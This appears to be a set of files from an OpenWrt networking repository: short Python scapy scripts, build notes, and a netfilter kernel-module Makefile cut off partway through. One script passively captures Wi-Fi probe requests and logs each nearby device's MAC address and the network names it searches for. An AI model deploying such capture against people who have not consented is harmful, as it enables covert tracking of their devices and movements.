"alpha_fraction": 0.4198019802570343,
"alphanum_fraction": 0.4376237690448761,
"avg_line_length": 28.647058486938477,
"blob_id": "32e38f0df11dcf2b2227c7056d989e801de8e4bb",
"content_id": "60e5d754c6838f9a9817be41324476dc55a679c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 17,
"path": "/python/scapy/probe-requests.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom scapy.all import *\nimport sys\n\ninterface = sys.argv[1] \n\ndef proc(p):\n if ( p.haslayer(Dot11ProbeReq) ):\n mac=re.sub(':','',p.addr2)\n ssid=p[Dot11Elt].info\n ssid=ssid.decode('utf-8','ignore')\n if ssid == \"\":\n ssid=\"<BROADCAST>\"\n print \"%s:%s\" %(mac,ssid)\n \nsniff(iface=interface, prn=proc, store=0)\n\n"
},
{
"alpha_fraction": 0.7692307829856873,
"alphanum_fraction": 0.8027295470237732,
"avg_line_length": 49.25,
"blob_id": "dac7cf4137341c5a29b166146a0fc22efa443850",
"content_id": "fbabb07de976a78e7b4e61d4f9de17bcd206f17f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 806,
"license_type": "no_license",
"max_line_length": 189,
"num_lines": 16,
"path": "/notes/relay-igmpproxy-arpnet-bridge.md",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "TODO\n\nWhen configuring the relayd eethernet to wireless wan use case it was thought that the arpnet with igmpproxy needed these patches. And perhaps it does, but not for my use case at the time.\n\nOpenwrt with ARPNAT reference:\nhttp://projectgus.com/2010/03/wireless-client-bridging-with-openwrt/\n\nThis is a patch from the Gargoyle fork for ARPNAT:\nhttp://www.gargoyle-router.com/gargoyle\n\nIt is to be applied to attitude adjustment branch and build also including ebtables when using configuration options client_bridge=1.\n\nhttps://forum.openwrt.org/viewtopic.php?id=30185&p=2\nhttps://forum.openwrt.org/viewtopic.php?id=42614\nhttp://www.gargoyle-router.com/gargoyle/projects/gargoyle/repository/revisions/master/entry/patches-generic/04-arpnat.patch\nhttp://www.dd-wrt.com/phpBB2/viewtopic.php?t=161963\n\n\n"
},
{
"alpha_fraction": 0.33076924085617065,
"alphanum_fraction": 0.3403846025466919,
"avg_line_length": 35,
"blob_id": "29565f0443f680d0e470c085cace0f7d4ad99730",
"content_id": "8992dafb1cebaaf4a58193280eb1efdfdfddd6ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1040,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 23,
"path": "/python/scapy/monitor-ip-mac.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom scapy.all import *\nimport re\nimport sys\n\ninterface = sys.argv[1] \nbaseMAC = sys.argv[2] \nIPregex = sys.argv[3]\nreg=re.compile(IPregex)\n\ndef monitorIPMAC(p): \n if p.haslayer(IP):\n iplayer = p.getlayer(IP)\n if reg.match(iplayer.src) or reg.match(iplayer.dst):\n if not (p.addr1==baseMAC or p.addr2==baseMAC or p.addr3==baseMAC): \n print \"---\"\n print \"MAC->\"+p.addr1+\"|\"+p.addr2+\"|\"+p.addr3\n print \"IP->\"+iplayer.src+\"|\"+iplayer.dst\n print \"---\" \n \n \nsniff(iface=interface,prn=monitorIPMAC,store=0)\n \n \n"
},
{
"alpha_fraction": 0.7707865238189697,
"alphanum_fraction": 0.7775281071662903,
"avg_line_length": 72.33333587646484,
"blob_id": "ca0f399a90b8caefac026c31fe3d92f107f9ce3e",
"content_id": "bbc9b72e68ac861a780a5edd89e6d52deb2f3fca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 218,
"num_lines": 6,
"path": "/notes/openvpn-fix-build-attitude-adjustment.md",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "\nIt is not clear what I did that night when trying to get the LuCI application for openvpn configured and built. But to the bes of my recollection it went something like this.\n\nIn general the luci-app-openvpn was available, but not showing up in menuconfig and the patch was used to hand apply changes to the core package to get it going. A copy of the patch is provided to reconstruct the fix.\n\n\nhttp://luci.subsignal.org/trac/ticket/489\n\n\n\n\n"
},
{
"alpha_fraction": 0.7355652451515198,
"alphanum_fraction": 0.7431961297988892,
"avg_line_length": 26.246395111083984,
"blob_id": "607fc61054d22fcea328403726bfcf5c51eebcd1",
"content_id": "e80c01d52443f044abd83a00bf83ca2a9d60d8ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 22671,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 832,
"path": "/packages/kernel/modules/netfilter.mk",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "\n#\n# Copyright (C) 2006-2010 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\nNF_MENU:=Netfilter Extensions\nNF_KMOD:=1\ninclude $(INCLUDE_DIR)/netfilter.mk\n\ndefine KernelPackage/ipt-core\n SUBMENU:=$(NF_MENU)\n TITLE:=Netfilter core\n KCONFIG:= \\\n \tCONFIG_NETFILTER=y \\\n\tCONFIG_NETFILTER_ADVANCED=y \\\n\t$(KCONFIG_IPT_CORE)\n FILES:=$(foreach mod,$(IPT_CORE-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,40,$(notdir $(IPT_CORE-m)))\nendef\n\ndefine KernelPackage/ipt-core/description\n Netfilter core kernel modules\n Includes:\n - comment\n - limit\n - LOG\n - mac\n - multiport\n - REJECT\n - TCPMSS\n-core\nendef\n\n$(eval $(call KernelPackage,ipt-core))\n\n\ndefine AddDepends/ipt\n SUBMENU:=$(NF_MENU)\n DEPENDS+= kmod-ipt-core $(1)\nendef\n\n\ndefine KernelPackage/ipt-conntrack\n TITLE:=Basic connection tracking modules\n KCONFIG:=$(KCONFIG_IPT_CONNTRACK)\n FILES:=$(foreach mod,$(IPT_CONNTRACK-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,41,$(notdir $(IPT_CONNTRACK-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-conntrack/description\n Netfilter (IPv4) kernel modules for connection tracking\n Includes:\n - conntrack\n - defrag\n - iptables_raw\n - NOTRACK\n - state\nendef\n\n$(eval $(call KernelPackage,ipt-conntrack))\n\n\ndefine KernelPackage/ipt-conntrack-extra\n TITLE:=Extra connection tracking modules\n KCONFIG:=$(KCONFIG_IPT_CONNTRACK_EXTRA)\n FILES:=$(foreach mod,$(IPT_CONNTRACK_EXTRA-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,42,$(notdir $(IPT_CONNTRACK_EXTRA-m)))\n $(call AddDepends/ipt,+kmod-ipt-conntrack)\nendef\n\ndefine KernelPackage/ipt-conntrack-extra/description\n Netfilter (IPv4) extra kernel modules for connection tracking\n Includes:\n - connbytes\n - connmark/CONNMARK\n - conntrack\n - helper\n - recent\nendef\n\n$(eval $(call KernelPackage,ipt-conntrack-extra))\n\n\ndefine KernelPackage/ipt-filter\n TITLE:=Modules for packet content inspection\n KCONFIG:=$(KCONFIG_IPT_FILTER)\n FILES:=$(foreach mod,$(IPT_FILTER-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_FILTER-m)))\n $(call AddDepends/ipt,+kmod-lib-textsearch)\nendef\n\ndefine KernelPackage/ipt-filter/description\n Netfilter (IPv4) kernel modules for packet content inspection\n Includes:\n - layer7\n - string\nendef\n\n$(eval $(call KernelPackage,ipt-filter))\n\n\ndefine KernelPackage/ipt-ipopt\n TITLE:=Modules for matching/changing IP packet options\n KCONFIG:=$(KCONFIG_IPT_IPOPT)\n FILES:=$(foreach mod,$(IPT_IPOPT-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_IPOPT-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-ipopt/description\n Netfilter (IPv4) modules for matching/changing IP packet options\n Includes:\n - CLASSIFY\n - dscp/DSCP\n - ecn/ECN\n - hl/HL\n - length\n - mark/MARK\n - statistic\n - tcpmss\n - time\n - ttl/TTL\n - unclean\nendef\n\n$(eval $(call KernelPackage,ipt-ipopt))\n\n\ndefine KernelPackage/ipt-ipsec\n TITLE:=Modules for matching IPSec packets\n KCONFIG:=$(KCONFIG_IPT_IPSEC)\n FILES:=$(foreach mod,$(IPT_IPSEC-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_IPSEC-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-ipsec/description\n Netfilter (IPv4) modules for matching IPSec packets\n Includes:\n - ah\n - esp\n - policy\nendef\n\n$(eval $(call KernelPackage,ipt-ipsec))\n\n\ndefine KernelPackage/ipt-nat\n TITLE:=Basic NAT targets\n KCONFIG:=$(KCONFIG_IPT_NAT)\n FILES:=$(foreach mod,$(IPT_NAT-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,42,$(notdir $(IPT_NAT-m)))\n $(call AddDepends/ipt,+kmod-ipt-conntrack)\nendef\n\ndefine KernelPackage/ipt-nat/description\n Netfilter (IPv4) kernel modules for basic NAT targets\n Includes:\n - MASQUERADE\nendef\n\n$(eval $(call KernelPackage,ipt-nat))\n\n\ndefine KernelPackage/ipt-nat-extra\n TITLE:=Extra NAT targets\n KCONFIG:=$(KCONFIG_IPT_NAT_EXTRA)\n FILES:=$(foreach mod,$(IPT_NAT_EXTRA-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,43,$(notdir $(IPT_NAT_EXTRA-m)))\n $(call AddDepends/ipt,+kmod-ipt-nat)\nendef\n\ndefine KernelPackage/ipt-nat-extra/description\n Netfilter (IPv4) kernel modules for extra NAT targets\n Includes:\n - NETMAP\n - REDIRECT\nendef\n\n$(eval $(call KernelPackage,ipt-nat-extra))\n\n\ndefine KernelPackage/ipt-nathelper\n TITLE:=Basic Conntrack and NAT helpers\n KCONFIG:=$(KCONFIG_IPT_NATHELPER)\n FILES:=$(foreach mod,$(IPT_NATHELPER-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_NATHELPER-m)))\n $(call AddDepends/ipt,+kmod-ipt-nat)\nendef\n\ndefine KernelPackage/ipt-nathelper/description\n Default Netfilter (IPv4) Conntrack and NAT helpers\n Includes:\n - ftp\n - irc\n - tftp\nendef\n\n$(eval $(call KernelPackage,ipt-nathelper))\n\n\ndefine KernelPackage/ipt-nathelper-extra\n TITLE:=Extra Conntrack and NAT helpers\n KCONFIG:=$(KCONFIG_IPT_NATHELPER_EXTRA)\n FILES:=$(foreach mod,$(IPT_NATHELPER_EXTRA-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_NATHELPER_EXTRA-m)))\n $(call AddDepends/ipt,+kmod-ipt-nat +kmod-lib-textsearch)\nendef\n\ndefine KernelPackage/ipt-nathelper-extra/description\n Extra Netfilter (IPv4) Conntrack and NAT helpers\n Includes:\n - amanda\n - h323\n - mms\n - pptp\n - proto_gre\n - sip\n - snmp_basic\n - broadcast\nendef\n\n$(eval $(call KernelPackage,ipt-nathelper-extra))\n\n\ndefine KernelPackage/ipt-queue\n TITLE:=Module for user-space packet queueing\n KCONFIG:=$(KCONFIG_IPT_QUEUE)\n FILES:=$(foreach mod,$(IPT_QUEUE-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_QUEUE-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-queue/description\n Netfilter (IPv4) module for user-space packet queueing\n Includes:\n - QUEUE\nendef\n\n$(eval $(call KernelPackage,ipt-queue))\n\n\ndefine KernelPackage/ipt-ulog\n TITLE:=Module for user-space packet logging\n KCONFIG:=$(KCONFIG_IPT_ULOG)\n FILES:=$(foreach mod,$(IPT_ULOG-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_ULOG-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-ulog/description\n Netfilter (IPv4) module for user-space packet logging\n Includes:\n - ULOG\nendef\n\n$(eval $(call KernelPackage,ipt-ulog))\n\n\ndefine KernelPackage/ipt-debug\n TITLE:=Module for debugging/development\n KCONFIG:=$(KCONFIG_IPT_DEBUG)\n DEFAULT:=n\n FILES:=$(foreach mod,$(IPT_DEBUG-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_DEBUG-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-debug/description\n Netfilter modules for debugging/development of the firewall\n Includes:\n - TRACE\nendef\n\n$(eval $(call KernelPackage,ipt-debug))\n\n\ndefine KernelPackage/ipt-led\n TITLE:=Module to trigger a LED with a Netfilter rule\n KCONFIG:=$(KCONFIG_IPT_LED)\n FILES:=$(foreach mod,$(IPT_LED-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,61,$(notdir $(IPT_LED-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-led/description\n Netfilter target to trigger a LED when a network packet is matched.\nendef\n\n$(eval $(call KernelPackage,ipt-led))\n\ndefine KernelPackage/ipt-tproxy\n TITLE:=Transparent proxying support\n DEPENDS+=+IPV6:kmod-ipv6\n KCONFIG:= \\\n \tCONFIG_NETFILTER_TPROXY \\\n \tCONFIG_NETFILTER_XT_MATCH_SOCKET \\\n \tCONFIG_NETFILTER_XT_TARGET_TPROXY\n FILES:= \\\n \t$(LINUX_DIR)/net/netfilter/nf_tproxy_core.ko \\\n \t$(foreach mod,$(IPT_TPROXY-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,50,$(notdir nf_tproxy_core $(IPT_TPROXY-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-tproxy/description\n Kernel modules for Transparent Proxying\nendef\n\n$(eval $(call KernelPackage,ipt-tproxy))\n\ndefine KernelPackage/ipt-tee\n TITLE:=TEE support\n KCONFIG:= \\\n \tCONFIG_NETFILTER_XT_TARGET_TEE\n FILES:= \\\n \t$(LINUX_DIR)/net/netfilter/xt_TEE.ko \\\n \t$(foreach mod,$(IPT_TEE-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir nf_tee $(IPT_TEE-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-tee/description\n Kernel modules for TEE\nendef\n\n$(eval $(call KernelPackage,ipt-tee))\n\n\ndefine KernelPackage/ipt-u32\n TITLE:=U32 support\n KCONFIG:= \\\n \tCONFIG_NETFILTER_XT_MATCH_U32\n FILES:= \\\n \t$(LINUX_DIR)/net/netfilter/xt_u32.ko \\\n \t$(foreach mod,$(IPT_U32-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir nf_tee $(IPT_U32-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-u32/description\n Kernel modules for U32\nendef\n\n$(eval $(call KernelPackage,ipt-u32))\n\n\ndefine KernelPackage/ipt-iprange\n TITLE:=Module for matching ip ranges\n KCONFIG:=$(KCONFIG_IPT_IPRANGE)\n FILES:=$(foreach mod,$(IPT_IPRANGE-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_IPRANGE-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-iprange/description\n Netfilter (IPv4) module for matching ip ranges\n Includes:\n - iprange\nendef\n\n$(eval $(call KernelPackage,ipt-iprange))\n\n\ndefine KernelPackage/ipt-extra\n TITLE:=Extra modules\n KCONFIG:=$(KCONFIG_IPT_EXTRA)\n FILES:=$(foreach mod,$(IPT_EXTRA-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,45,$(notdir $(IPT_EXTRA-m)))\n $(call AddDepends/ipt)\nendef\n\ndefine KernelPackage/ipt-extra/description\n Other Netfilter (IPv4) kernel modules\n Includes:\n - owner\n - physdev (if bridge support was enabled in kernel)\n - pkttype\n - quota\nendef\n\n$(eval $(call KernelPackage,ipt-extra))\n\n\ndefine KernelPackage/ip6tables\n SUBMENU:=$(NF_MENU)\n TITLE:=IPv6 modules\n DEPENDS:=+kmod-ipv6\n KCONFIG:=$(KCONFIG_IPT_IPV6)\n FILES:=$(foreach mod,$(IPT_IPV6-m),$(LINUX_DIR)/net/$(mod).ko)\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(IPT_IPV6-m)))\nendef\n\ndefine KernelPackage/ip6tables/description\n Netfilter IPv6 firewalling support\nendef\n\n$(eval $(call KernelPackage,ip6tables))\n\n\ndefine KernelPackage/arptables\n SUBMENU:=$(NF_MENU)\n TITLE:=ARP firewalling modules\n FILES:=$(LINUX_DIR)/net/ipv4/netfilter/arp*.ko\n KCONFIG:=CONFIG_IP_NF_ARPTABLES \\\n CONFIG_IP_NF_ARPFILTER \\\n CONFIG_IP_NF_ARP_MANGLE\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(patsubst %.ko,%,$(wildcard $(LINUX_DIR)/net/ipv4/netfilter/arp*.ko))))\nendef\n\ndefine KernelPackage/arptables/description\n Kernel modules for ARP firewalling\nendef\n\n$(eval $(call KernelPackage,arptables))\n\n\ndefine KernelPackage/ebtables\n SUBMENU:=$(NF_MENU)\n TITLE:=Bridge firewalling modules\n FILES:=$(foreach mod,$(EBTABLES-m),$(LINUX_DIR)/net/$(mod).ko)\n KCONFIG:=CONFIG_BRIDGE_NETFILTER=y \\\n\t$(KCONFIG_EBTABLES)\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(EBTABLES-m)))\nendef\n\ndefine KernelPackage/ebtables/description\n ebtables is a general, extensible frame/packet identification\n framework. It provides you to do Ethernet\n filtering/NAT/brouting on the Ethernet bridge.\nendef\n\n$(eval $(call KernelPackage,ebtables))\n\n\ndefine AddDepends/ebtables\n SUBMENU:=$(NF_MENU)\n DEPENDS+=kmod-ebtables $(1)\nendef\n\n\ndefine KernelPackage/ebtables-ipv4\n TITLE:=ebtables: IPv4 support\n FILES:=$(foreach mod,$(EBTABLES_IP4-m),$(LINUX_DIR)/net/$(mod).ko)\n KCONFIG:=$(KCONFIG_EBTABLES_IP4)\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(EBTABLES_IP4-m)))\n $(call AddDepends/ebtables)\nendef\n\ndefine KernelPackage/ebtables-ipv4/description\n This option adds the IPv4 support to ebtables, which allows basic\n IPv4 header field filtering, ARP filtering as well as SNAT, DNAT targets.\nendef\n\n$(eval $(call KernelPackage,ebtables-ipv4))\n\n\ndefine KernelPackage/ebtables-ipv6\n TITLE:=ebtables: IPv6 support\n FILES:=$(foreach mod,$(EBTABLES_IP6-m),$(LINUX_DIR)/net/$(mod).ko)\n KCONFIG:=$(KCONFIG_EBTABLES_IP6)\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(EBTABLES_IP6-m)))\n $(call AddDepends/ebtables)\nendef\n\ndefine KernelPackage/ebtables-ipv6/description\n This option adds the IPv6 support to ebtables, which allows basic\n IPv6 header field filtering and target support.\nendef\n\n$(eval $(call KernelPackage,ebtables-ipv6))\n\n\ndefine KernelPackage/ebtables-watchers\n TITLE:=ebtables: watchers support\n FILES:=$(foreach mod,$(EBTABLES_WATCHERS-m),$(LINUX_DIR)/net/$(mod).ko)\n KCONFIG:=$(KCONFIG_EBTABLES_WATCHERS)\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(EBTABLES_WATCHERS-m)))\n $(call AddDepends/ebtables)\nendef\n\ndefine KernelPackage/ebtables-watchers/description\n This option adds the log watchers, that you can use in any rule\n in any ebtables table.\nendef\n\n$(eval $(call KernelPackage,ebtables-watchers))\n\n\ndefine KernelPackage/nfnetlink\n SUBMENU:=$(NF_MENU)\n TITLE:=Netlink-based userspace interface\n DEPENDS:=+kmod-ipt-core\n FILES:=$(LINUX_DIR)/net/netfilter/nfnetlink.ko\n KCONFIG:=CONFIG_NETFILTER_NETLINK\n AUTOLOAD:=$(call AutoLoad,48,nfnetlink)\nendef\n\ndefine KernelPackage/nfnetlink/description\n Kernel modules support for a netlink-based userspace interface\nendef\n\n$(eval $(call KernelPackage,nfnetlink))\n\n\ndefine AddDepends/nfnetlink\n SUBMENU:=$(NF_MENU)\n DEPENDS+=+kmod-nfnetlink $(1)\nendef\n\n\ndefine KernelPackage/nfnetlink-log\n TITLE:=Netfilter LOG over NFNETLINK interface\n FILES:=$(LINUX_DIR)/net/netfilter/nfnetlink_log.ko\n KCONFIG:=CONFIG_NETFILTER_NETLINK_LOG\n AUTOLOAD:=$(call AutoLoad,48,nfnetlink_log)\n $(call AddDepends/nfnetlink)\nendef\n\ndefine KernelPackage/nfnetlink-log/description\n Kernel modules support for logging packets via NFNETLINK\nendef\n\n$(eval $(call KernelPackage,nfnetlink-log))\n\n\ndefine KernelPackage/nfnetlink-queue\n TITLE:=Netfilter QUEUE over NFNETLINK interface\n FILES:=$(LINUX_DIR)/net/netfilter/nfnetlink_queue.ko\n KCONFIG:=CONFIG_NETFILTER_NETLINK_QUEUE\n AUTOLOAD:=$(call AutoLoad,48,nfnetlink_queue)\n $(call AddDepends/nfnetlink)\nendef\n\ndefine KernelPackage/nfnetlink-queue/description\n Kernel modules support for queueing packets via NFNETLINK\nendef\n\n$(eval $(call KernelPackage,nfnetlink-queue))\n\n\ndefine KernelPackage/nf-conntrack-netlink\n TITLE:=Connection tracking netlink interface\n FILES:=$(LINUX_DIR)/net/netfilter/nf_conntrack_netlink.ko\n KCONFIG:=CONFIG_NF_CT_NETLINK\n AUTOLOAD:=$(call AutoLoad,49,nf_conntrack_netlink)\n $(call AddDepends/nfnetlink,+kmod-ipt-conntrack)\nendef\n\ndefine KernelPackage/nf-conntrack-netlink/description\n Kernel modules support for a netlink-based connection tracking \n userspace interface\nendef\n\n$(eval $(call KernelPackage,nf-conntrack-netlink))\n\ndefine KernelPackage/ipt-hashlimit\n SUBMENU:=$(NF_MENU)\n TITLE:=Netfilter hashlimit match\n KCONFIG:=$(KCONFIG_IPT_HASHLIMIT)\n FILES:=$(LINUX_DIR)/net/netfilter/xt_hashlimit.ko\n AUTOLOAD:=$(call AutoLoad,50,xt_hashlimit)\n $(call KernelPackage/ipt)\nendef\n\ndefine KernelPackage/ipt-hashlimit/description\n Kernel modules support for the hashlimit bucket match module\nendef\n\n$(eval $(call KernelPackage,ipt-hashlimit))\n\n\ndefine KernelPackage/ipvs-core\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server Support\n KCONFIG:= \\\n CONFIG_IP_VS \\\n CONFIG_IP_VS_IPV6=y \\\n CONFIG_IP_VS_PROTO_TCP=y \\\n CONFIG_IP_VS_PROTO_UDP=y \\\n CONFIG_IP_VS_PROTO_ESP=y \\\n CONFIG_IP_VS_PROTO_AH=y \\\n CONFIG_IP_VS_PROTO_SCTP=y \\\n CONFIG_IP_VS_NFCT=y \\\n CONFIG_IP_VS_DEBUG=n \\\n CONFIG_IP_VS_TAB_BITS=12 \\\n CONFIG_IP_VS_SH_TAB_BITS=8 \\\n CONFIG_NETFILTER_XT_MATCH_IPVS=n\n DEPENDS:=+kmod-ipt-core +kmod-lib-crc32c +ip6tables\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs.ko\n AUTOLOAD:=$(call AutoLoad,60,ip_vs)\nendef\n\ndefine KernelPackage/ipvs-core/description\n Kernel modules core support for Linux Virtual Server\nendef\n\n$(eval $(call KernelPackage,ipvs-core))\n\ndefine KernelPackage/ipvs-rr\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server Round Robin Scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_RR\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_rr.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_rr)\nendef\n\ndefine KernelPackage/ipvs-rr/description\n The robin-robin scheduling algorithm simply directs network\nendef\n\n$(eval $(call KernelPackage,ipvs-rr))\n\ndefine KernelPackage/ipvs-wrr\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server weighted round robin scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_WRR\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_wrr.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_wrr)\nendef\n\ndefine KernelPackage/ipvs-wrr/description\n The robin-robin scheduling algorithm with weights\nendef\n\n$(eval $(call KernelPackage,ipvs-wrr))\n\ndefine KernelPackage/ipvs-lc\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server least connections scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_LC\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_lc.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_lc)\nendef\n\ndefine KernelPackage/ipvs-lc/description\n The least-connection scheduling algorithm directs network\n connections to the server with the least number of active\n connections\nendef\n\n$(eval $(call KernelPackage,ipvs-lc))\n\ndefine KernelPackage/ipvs-wlc\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server weighted least connections scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_WLC\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_wlc.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_wlc)\nendef\n\ndefine KernelPackage/ipvs-wlc/description\n The least-connection scheduling algorithm directs network\n connections to the server with the least connections with\n normalized by the server weight\nendef\n\n$(eval $(call KernelPackage,ipvs-wlc))\n\ndefine KernelPackage/ipvs-lblc\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server locality based connections scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_LBLC\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_lblc.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_lblc)\nendef\n\ndefine KernelPackage/ipvs-lblc/description\n The locality-based least-connection scheduling algorithm is for\n destination IP load balancing. It is usually used in cache cluster\n This algorithm usually directs packet destined for an IP address to\n its server if the server is alive and under load. If the server is\n overloaded (its active connection numbers is larger than its weight)\n and there is a server in its half load, then allocate the weighted\n least-connection server to this IP address.\nendef\n\n$(eval $(call KernelPackage,ipvs-lblc))\n\ndefine KernelPackage/ipvs-lblcr\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server locality based with replication\n KCONFIG:= \\\n CONFIG_IP_VS_LBLCR\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_lblcr.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_lblcr)\nendef\n\ndefine KernelPackage/ipvs-lblcr/description\n The locality-based least-connection with replication scheduling\n algorithm is also for destination IP load balancing. It is\n usually used in cache cluster. It differs from the LBLC\n scheduling as follows: the load balancer maintains mappings from a target\n to a set of server nodes that can serve the target. Requests \n for a target are assigned to the least-connection node in the target's\n server set. If all the node in the server set are over\n loaded, it picks up a least-connection node in the cluster and adds it\n in the sever set for the target. If the server set has not been\n modified for the specified time, the most loaded node is\n removed from the server set, in order to avoid high degree of replication\nendef\n\n$(eval $(call KernelPackage,ipvs-lblcr))\n\ndefine KernelPackage/ipvs-dh\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server destination hashing scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_DH\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_dh.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_dh)\nendef\n\ndefine KernelPackage/ipvs-dh/description\n The destination hashing scheduling algorithm assigns network\n connections to the servers through looking up a statically assigned\n hash table by their destination IP addresses\nendef\n\n$(eval $(call KernelPackage,ipvs-dh))\n\ndefine KernelPackage/ipvs-sh\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server source hashing scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_SH\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_sh.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_sh)\nendef\n\ndefine KernelPackage/ipvs-sh/description\n The source hashing scheduling algorithm assigns network\n connections to the servers through looking up a statically assigned\n hash table by their source IP addresses\nendef\n\n$(eval $(call KernelPackage,ipvs-sh))\n\ndefine KernelPackage/ipvs-sed\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server shortest expected delay scheduling\n KCONFIG:= \\\n CONFIG_IP_VS_SED\n 